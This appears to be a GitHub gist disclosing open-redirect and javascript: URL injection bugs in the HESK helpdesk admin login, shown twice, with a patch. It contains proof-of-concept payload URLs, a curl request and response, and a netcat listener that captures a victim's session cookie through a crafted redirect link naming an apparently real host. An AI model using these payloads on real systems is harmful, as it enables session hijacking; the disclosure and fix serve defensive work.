cedriczirtacic · August 29, 2015 14:04
diff --git a/attack b/attack
 HTTP/1.1 200 OK
 Server: test
 Content-Type: text/html; charset=UTF-8
 Date: Tue, 05 Aug 2014 14:42:52 GMT
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 13

 <h1>TEST</h1>
diff --git a/gistfile1.txt b/gistfile1.txt
 Basically is the same bug but there's more than one way to exploit it.

 There is a positive side of this: both of this proof-of-concepts are difficult to exploit because of how you code it and browser-side protections.

 I will make more tests but this is what I've found so far.
diff --git a/gistfile2.txt b/gistfile2.txt
 (#) Javascript Injection via CWE-601 (CWE-89):

 http://www.website.com/admin/index.php?goto=javascript:alert(0)

 (#) Response:

 [root@server www]# curl -v 'http://www.website.com/admin/index.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=test&pass=test123&remember_u
 ser=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29' --compressed
 * About to connect() to www.website.com port 80
 *   Trying 10.73.2.4... connected
 * Connected to www.website.com (10.73.2.4) port 80
 > POST /admin/index.php HTTP/1.1
 > User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
 > Host: www.website.com
 > Accept: */*
 > Accept-Encoding: deflate, gzip
 > Content-Type: application/x-www-form-urlencoded
 > Content-Length: 89
 > 
 > user=test&pass=test123&remember_user=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29HTTP/1.1 302 Found
 < Date: Tue, 05 Aug 2014 15:23:48 GMT
 < Server: Apache/2.2.3 (Red Hat)
 < Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=i2llpc6hd2hkksbbr4qttr5n86; path=/
 < Expires: Thu, 19 Nov 1981 08:52:00 GMT
 < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 < Pragma: no-cache
 < P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
 < Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=pq6k294tm4u93n9gfvn5gm0in7; path=/
 < Set-Cookie: hesk_username=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
 < Set-Cookie: hesk_p=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
 < Location: javascript:alert(0)
 < Content-Length: 153
 < Connection: close
 < Content-Type: text/html; charset=UTF-8
diff --git a/gistfile3.txt b/gistfile3.txt
 (#) URL Redirection (CWE-601):

 This one is more difficult to exploit because it relies on what you have setted as $hesk_settings['hesk_url'].
 Lets say that a user gained access/can execute a command as any user (it doesn't have to be super user) the he can manipulate via the same _goto_ parameter the reponse and/or obtain the request header (including the cookie value) and gain the users' access:


 (#) Proof-Of-Concept:

 (1) Attacker creates a "server" listening in port 1337 with a response inside the "attack" file:

 [root@server www]# nc -l 1337 -v < attack

 (2) Sends a user the link: http://prehesk.hacienda-gcba.gov.ar/admin/index.php?goto=http://prehesk.hacienda-gcba.gov.ar:1337

 (3.1) The attacker receives the request header with the users' data:

 [root@server www]# nc -l 1337 -v < attack
 Connection from 10.73.10.217 port 1337 [tcp/menandmice-dns] accepted
 GET / HTTP/1.1
 Host: www.website.com:1337
 Connection: keep-alive
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
 Referer: http://www.website.com/admin/index.php?goto=http://www.website.com:1337
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: es-419,es;q=0.8,en-US;q=0.6,en;q=0.4
 Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=ausbcabgb32v3b6s0bg3pk3071

 (3.2) The user receives the special response written by the attacker. It can also contain HTML/Javascript code or another "Location" header to redirect the user to another server.

diff --git a/index.patch b/index.patch
 --- index.php.old       2014-08-05 14:22:30.000000000 -0300
 +++ index.php   2014-08-05 14:28:08.000000000 -0300
 @@ -239,7 +239,8 @@
 
         if (isset($myurl['host']) && isset($goto['host']))
         {
 -               if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) )
 +               if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) || isset($goto['port'])
 +                       || (isset($goto['scheme']) && !preg_match('/^https*$/', $goto['scheme'])) )
             {
                $url = 'admin_main.php';
             }
	HTTP/1.1 200 OK
	Server: test
	Content-Type: text/html; charset=UTF-8
	Date: Tue, 05 Aug 2014 14:42:52 GMT
	Expires: Thu, 19 Nov 1981 08:52:00 GMT
	Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
	Pragma: no-cache
	Content-Length: 13

	<h1>TEST</h1>
	Basically is the same bug but there's more than one way to exploit it.

	There is a positive side of this: both of this proof-of-concepts are difficult to exploit because of how you code it and browser-side protections.

	I will make more tests but this is what I've found so far.
	(#) Javascript Injection via CWE-601 (CWE-89):

	http://www.website.com/admin/index.php?goto=javascript:alert(0)

	(#) Response:

	[root@server www]# curl -v 'http://www.website.com/admin/index.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=test&pass=test123&remember_u
	ser=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29' --compressed
	* About to connect() to www.website.com port 80
	* Trying 10.73.2.4... connected
	* Connected to www.website.com (10.73.2.4) port 80
	> POST /admin/index.php HTTP/1.1
	> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
	> Host: www.website.com
	> Accept: /
	> Accept-Encoding: deflate, gzip
	> Content-Type: application/x-www-form-urlencoded
	> Content-Length: 89
	>
	> user=test&pass=test123&remember_user=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29HTTP/1.1 302 Found
	< Date: Tue, 05 Aug 2014 15:23:48 GMT
	< Server: Apache/2.2.3 (Red Hat)
	< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=i2llpc6hd2hkksbbr4qttr5n86; path=/
	< Expires: Thu, 19 Nov 1981 08:52:00 GMT
	< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
	< Pragma: no-cache
	< P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
	< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=pq6k294tm4u93n9gfvn5gm0in7; path=/
	< Set-Cookie: hesk_username=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
	< Set-Cookie: hesk_p=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
	< Location: javascript:alert(0)
	< Content-Length: 153
	< Connection: close
	< Content-Type: text/html; charset=UTF-8
	(#) URL Redirection (CWE-601):

	This one is more difficult to exploit because it relies on what you have setted as $hesk_settings['hesk_url'].
	Lets say that a user gained access/can execute a command as any user (it doesn't have to be super user) the he can manipulate via the same _goto_ parameter the reponse and/or obtain the request header (including the cookie value) and gain the users' access:


	(#) Proof-Of-Concept:

	(1) Attacker creates a "server" listening in port 1337 with a response inside the "attack" file:

	[root@server www]# nc -l 1337 -v < attack

	(2) Sends a user the link: http://prehesk.hacienda-gcba.gov.ar/admin/index.php?goto=http://prehesk.hacienda-gcba.gov.ar:1337

	(3.1) The attacker receives the request header with the users' data:

	[root@server www]# nc -l 1337 -v < attack
	Connection from 10.73.10.217 port 1337 [tcp/menandmice-dns] accepted
	GET / HTTP/1.1
	Host: www.website.com:1337
	Connection: keep-alive
	Cache-Control: max-age=0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
	Referer: http://www.website.com/admin/index.php?goto=http://www.website.com:1337
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: es-419,es;q=0.8,en-US;q=0.6,en;q=0.4
	Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=ausbcabgb32v3b6s0bg3pk3071

	(3.2) The user receives the special response written by the attacker. It can also contain HTML/Javascript code or another "Location" header to redirect the user to another server.
	--- index.php.old 2014-08-05 14:22:30.000000000 -0300
	+++ index.php 2014-08-05 14:28:08.000000000 -0300
	@@ -239,7 +239,8 @@

	if (isset($myurl['host']) && isset($goto['host']))
	{
	- if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) )
	+ if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) \|\| isset($goto['port'])
	+ \|\| (isset($goto['scheme']) && !preg_match('/^https*$/', $goto['scheme'])) )
	{
	$url = 'admin_main.php';
	}